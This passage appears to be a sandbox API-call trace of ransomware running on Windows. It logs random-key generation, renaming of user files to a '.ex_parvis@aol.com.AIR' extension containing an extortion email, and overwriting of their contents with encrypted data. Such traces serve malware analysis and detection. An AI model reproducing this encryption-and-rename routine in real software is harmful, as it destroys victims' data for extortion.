returned 1 [0167.016] WriteFile (in: hFile=0x52c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.016] ReadFile (in: hFile=0x52c, lpBuffer=0x3b2410, nNumberOfBytesToRead=0xa5e4, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, lpNumberOfBytesRead=0x2acf9c8*=0xa5e4, lpOverlapped=0x0) returned 1 [0167.019] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.019] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.020] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\z2TqW4S.bmp", dwFileAttributes=0x80) returned 1 [0167.020] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\z2TqW4S.bmp") returned 58 [0167.020] GetProcessHeap () returned 0x2e0000 [0167.020] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xda) returned 0x3a7428 [0167.020] lstrcpyW (in: lpString1=0x3a7428, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\z2TqW4S.bmp" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\z2TqW4S.bmp") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\z2TqW4S.bmp" [0167.020] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\z2TqW4S.bmp", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\z2TqW4S.bmp.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\z2TqW4S.bmp.12781717671972518758.ex_parvis@aol.com.AIR" [0167.020] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\z2TqW4S.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\z2tqw4s.bmp"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\z2TqW4S.bmp.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\z2tqw4s.bmp.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.025] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\z2TqW4S.bmp.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\z2tqw4s.bmp.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0167.025] GetProcessHeap () returned 0x2e0000 [0167.025] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7428 | out: hHeap=0x2e0000) returned 1 [0167.025] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=61242) returned 1 [0167.025] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xef3a [0167.025] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.025] GetProcessHeap () returned 0x2e0000 [0167.025] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.025] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.026] WriteFile (in: hFile=0x52c, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.027] WriteFile (in: hFile=0x52c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.027] WriteFile (in: hFile=0x52c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.027] ReadFile (in: hFile=0x52c, lpBuffer=0x3b2410, nNumberOfBytesToRead=0xef3a, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, lpNumberOfBytesRead=0x2acf9c8*=0xef3a, lpOverlapped=0x0) returned 1 [0167.029] SetFilePointer (in: hFile=0x52c, lDistanceToMove=-61242, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.029] WriteFile (in: hFile=0x52c, lpBuffer=0x30f0048*, nNumberOfBytesToWrite=0xef3a, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30f0048*, lpNumberOfBytesWritten=0x2acf9c8*=0xef3a, lpOverlapped=0x0) returned 1 [0167.029] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.029] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.030] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Y8eqoABdHlH6nWG.pptx", dwFileAttributes=0x80) returned 1 [0167.030] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Y8eqoABdHlH6nWG.pptx") returned 67 [0167.030] GetProcessHeap () returned 0x2e0000 [0167.030] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xec) returned 0x32f868 [0167.030] lstrcpyW (in: lpString1=0x32f868, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Y8eqoABdHlH6nWG.pptx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Y8eqoABdHlH6nWG.pptx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Y8eqoABdHlH6nWG.pptx" [0167.030] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Y8eqoABdHlH6nWG.pptx", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Y8eqoABdHlH6nWG.pptx.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Y8eqoABdHlH6nWG.pptx.12781717671972518758.ex_parvis@aol.com.AIR" [0167.030] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Y8eqoABdHlH6nWG.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\y8eqoabdhlh6nwg.pptx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Y8eqoABdHlH6nWG.pptx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\y8eqoabdhlh6nwg.pptx.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.034] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Y8eqoABdHlH6nWG.pptx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\y8eqoabdhlh6nwg.pptx.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0167.034] GetProcessHeap () returned 0x2e0000 [0167.034] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x32f868 | out: hHeap=0x2e0000) returned 1 [0167.034] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=2996) returned 1 [0167.034] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xbb4 [0167.034] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.034] GetProcessHeap () returned 0x2e0000 [0167.034] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.034] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.034] WriteFile (in: hFile=0x52c, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.035] WriteFile (in: hFile=0x52c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.035] WriteFile (in: hFile=0x52c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.035] ReadFile (in: hFile=0x52c, lpBuffer=0x31d01e0, nNumberOfBytesToRead=0xbb4, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d01e0*, lpNumberOfBytesRead=0x2acf9c8*=0xbb4, lpOverlapped=0x0) returned 1 [0167.035] SetFilePointer (in: hFile=0x52c, lDistanceToMove=-2996, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.035] WriteFile (in: hFile=0x52c, lpBuffer=0x3b2410*, nNumberOfBytesToWrite=0xbb4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, lpNumberOfBytesWritten=0x2acf9c8*=0xbb4, lpOverlapped=0x0) returned 1 [0167.036] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.036] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.036] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Uc04i1N2o6.gif", dwFileAttributes=0x80) returned 1 [0167.037] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Uc04i1N2o6.gif") returned 61 [0167.037] GetProcessHeap () returned 0x2e0000 [0167.037] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xe0) returned 0x3a7428 [0167.037] lstrcpyW (in: lpString1=0x3a7428, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Uc04i1N2o6.gif" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Uc04i1N2o6.gif") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Uc04i1N2o6.gif" [0167.037] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Uc04i1N2o6.gif", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Uc04i1N2o6.gif.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Uc04i1N2o6.gif.12781717671972518758.ex_parvis@aol.com.AIR" [0167.037] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Uc04i1N2o6.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\uc04i1n2o6.gif"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Uc04i1N2o6.gif.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\uc04i1n2o6.gif.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.041] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Uc04i1N2o6.gif.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\uc04i1n2o6.gif.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0167.041] GetProcessHeap () returned 0x2e0000 [0167.041] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7428 | out: hHeap=0x2e0000) returned 1 [0167.041] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=91770) returned 1 [0167.041] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x1667a [0167.041] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.041] GetProcessHeap () returned 0x2e0000 [0167.041] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.041] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.041] WriteFile (in: hFile=0x52c, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.042] WriteFile (in: hFile=0x52c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.042] WriteFile (in: hFile=0x52c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.043] ReadFile (in: hFile=0x52c, lpBuffer=0x3b2410, nNumberOfBytesToRead=0x1667a, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, lpNumberOfBytesRead=0x2acf9c8*=0x1667a, lpOverlapped=0x0) returned 1 [0167.046] SetFilePointer (in: hFile=0x52c, lDistanceToMove=-91770, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.046] WriteFile (in: hFile=0x52c, lpBuffer=0x30f0048*, nNumberOfBytesToWrite=0x1667a, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30f0048*, lpNumberOfBytesWritten=0x2acf9c8*=0x1667a, lpOverlapped=0x0) returned 1 [0167.047] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.047] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.047] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\U1Q3.ppt", dwFileAttributes=0x80) returned 1 [0167.047] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\U1Q3.ppt") returned 55 [0167.047] GetProcessHeap () returned 0x2e0000 [0167.047] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd4) returned 0x319820 [0167.047] lstrcpyW (in: lpString1=0x319820, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\U1Q3.ppt" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\U1Q3.ppt") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\U1Q3.ppt" [0167.047] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\U1Q3.ppt", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\U1Q3.ppt.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\U1Q3.ppt.12781717671972518758.ex_parvis@aol.com.AIR" [0167.048] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\U1Q3.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\u1q3.ppt"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\U1Q3.ppt.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\u1q3.ppt.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.053] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\U1Q3.ppt.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\u1q3.ppt.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0167.054] GetProcessHeap () returned 0x2e0000 [0167.054] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319820 | out: hHeap=0x2e0000) returned 1 [0167.054] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=7039) returned 1 [0167.054] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x1b7f [0167.054] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.054] GetProcessHeap () returned 0x2e0000 [0167.054] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.054] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.054] WriteFile (in: hFile=0x52c, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.055] WriteFile (in: hFile=0x52c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.055] WriteFile (in: hFile=0x52c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.055] ReadFile (in: hFile=0x52c, lpBuffer=0x3b2410, nNumberOfBytesToRead=0x1b7f, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, lpNumberOfBytesRead=0x2acf9c8*=0x1b7f, lpOverlapped=0x0) returned 1 [0167.055] SetFilePointer (in: hFile=0x52c, lDistanceToMove=-7039, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.055] WriteFile (in: hFile=0x52c, lpBuffer=0x3b3f98*, nNumberOfBytesToWrite=0x1b7f, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b3f98*, lpNumberOfBytesWritten=0x2acf9c8*=0x1b7f, lpOverlapped=0x0) returned 1 [0167.056] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.056] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.056] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tPIXXQThlEpLt6-.wav", dwFileAttributes=0x80) returned 1 [0167.057] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tPIXXQThlEpLt6-.wav") returned 66 [0167.057] GetProcessHeap () returned 0x2e0000 [0167.057] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xea) returned 0x32f868 [0167.057] lstrcpyW (in: lpString1=0x32f868, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tPIXXQThlEpLt6-.wav" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tPIXXQThlEpLt6-.wav") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tPIXXQThlEpLt6-.wav" [0167.057] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tPIXXQThlEpLt6-.wav", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tPIXXQThlEpLt6-.wav.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tPIXXQThlEpLt6-.wav.12781717671972518758.ex_parvis@aol.com.AIR" [0167.057] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tPIXXQThlEpLt6-.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\tpixxqthleplt6-.wav"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tPIXXQThlEpLt6-.wav.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\tpixxqthleplt6-.wav.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.060] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tPIXXQThlEpLt6-.wav.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\tpixxqthleplt6-.wav.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0167.060] GetProcessHeap () returned 0x2e0000 [0167.060] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x32f868 | out: hHeap=0x2e0000) returned 1 [0167.060] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=66681) returned 1 [0167.060] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x10479 [0167.060] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.060] GetProcessHeap () returned 0x2e0000 [0167.060] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.060] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.060] WriteFile (in: hFile=0x52c, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.061] WriteFile (in: hFile=0x52c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.061] WriteFile (in: hFile=0x52c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.062] ReadFile (in: hFile=0x52c, lpBuffer=0x3b2410, nNumberOfBytesToRead=0x10479, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, lpNumberOfBytesRead=0x2acf9c8*=0x10479, lpOverlapped=0x0) returned 1 [0167.064] SetFilePointer (in: hFile=0x52c, lDistanceToMove=-66681, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.064] WriteFile (in: hFile=0x52c, lpBuffer=0x30f0048*, nNumberOfBytesToWrite=0x10479, lpNumberOfBytesWritten=0x2acf9c8, 